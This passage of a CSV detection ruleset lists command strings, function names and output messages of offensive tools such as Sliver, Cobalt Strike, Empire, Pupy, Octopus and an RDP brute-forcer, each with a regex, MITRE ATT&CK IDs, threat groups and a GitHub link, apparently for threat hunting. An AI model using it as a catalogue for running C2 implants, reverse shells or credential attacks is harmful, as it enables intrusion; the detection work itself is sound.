T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate exe Shadow*",".{0,1000}generate\sexe\sShadow.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*generate --http http*",".{0,1000}generate\s\-\-http\shttp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate --mtls * --os windows *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-os\swindows\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate --mtls * --save 
*",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate payload=*",".{0,1000}generate\spayload\=.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*generate --tcp-pivot *",".{0,1000}generate\s\-\-tcp\-pivot\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate/canaries.go*",".{0,1000}generate\/canaries\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate/implants.go*",".{0,1000}generate\/implants\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*generate_beacon*",".{0,1000}generate_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*generate_beanshell1*",".{0,1000}generate_beanshell1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_exploit_path_from_template(*",".{0,1000}generate_exploit_path_from_template\(.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*generate_exploit_path_from_template*",".{0,1000}generate_exploit_path_from_template.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*generate_golden_saml*",".{0,1000}generate_golden_saml.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*generate_hta operation1*",".{0,1000}generate_hta\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is 
an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_jdk8u20*",".{0,1000}generate_jdk8u20.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_loader_cmd*",".{0,1000}generate_loader_cmd.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*generate_mozillarhino1*",".{0,1000}generate_mozillarhino1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell 
spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_mozillarhino2*",".{0,1000}generate_mozillarhino2.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" "*generate_payload(language, ip, port)*",".{0,1000}generate_payload\(language,\sip,\sport\).{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*generate_powershell operation1*",".{0,1000}generate_powershell\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_powershell_exe*",".{0,1000}generate_powershell_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_powershell_shellcode*",".{0,1000}generate_powershell_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 
T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_python_exe*",".{0,1000}generate_python_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - 
TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_python_shellcode*",".{0,1000}generate_python_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_raw_payload*",".{0,1000}generate_raw_payload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*generate_spoofed_args_exe*",".{0,1000}generate_spoofed_args_exe.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_stageless*",".{0,1000}generate_stageless.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*generate_unmanaged_exe operation1 *.exe",".{0,1000}generate_unmanaged_exe\soperation1\s.{0,1000}\.exe","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_x64_shellcode*",".{0,1000}generate_x64_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*generate_x86_shellcode*",".{0,1000}generate_x86_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*Generated random password for socks proxy:*",".{0,1000}Generated\srandom\spassword\sfor\ssocks\sproxy\:.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*Generated shellcode successfully saved in file *",".{0,1000}Generated\sshellcode\ssuccessfully\ssaved\sin\sfile\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense 
Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*GenerateDllBase64Hta*",".{0,1000}GenerateDllBase64Hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateExeBase64*",".{0,1000}GenerateExeBase64.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*GenerateForcedBrowseWordlist.py*",".{0,1000}GenerateForcedBrowseWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*generateInjectBinFile*",".{0,1000}generateInjectBinFile.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Generate-Macro.ps1*",".{0,1000}Generate\-Macro\.ps1.{0,1000}","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","7","671","208","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z" "*GenerateParameterWordlist.py*",".{0,1000}GenerateParameterWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*GenerateReverseTcpDrone*",".{0,1000}GenerateReverseTcpDrone.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*generate-rotating-beacon.*",".{0,1000}generate\-rotating\-beacon\..{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" "*GeneratesShellcodeFromPEorDll*",".{0,1000}GeneratesShellcodeFromPEorDll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Generating sliver binary for *",".{0,1000}Generating\ssliver\sbinary\sfor\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*Generator IP@Login;Password*",".{0,1000}Generator\sIP\@Login\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","10","1","39","31","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z" 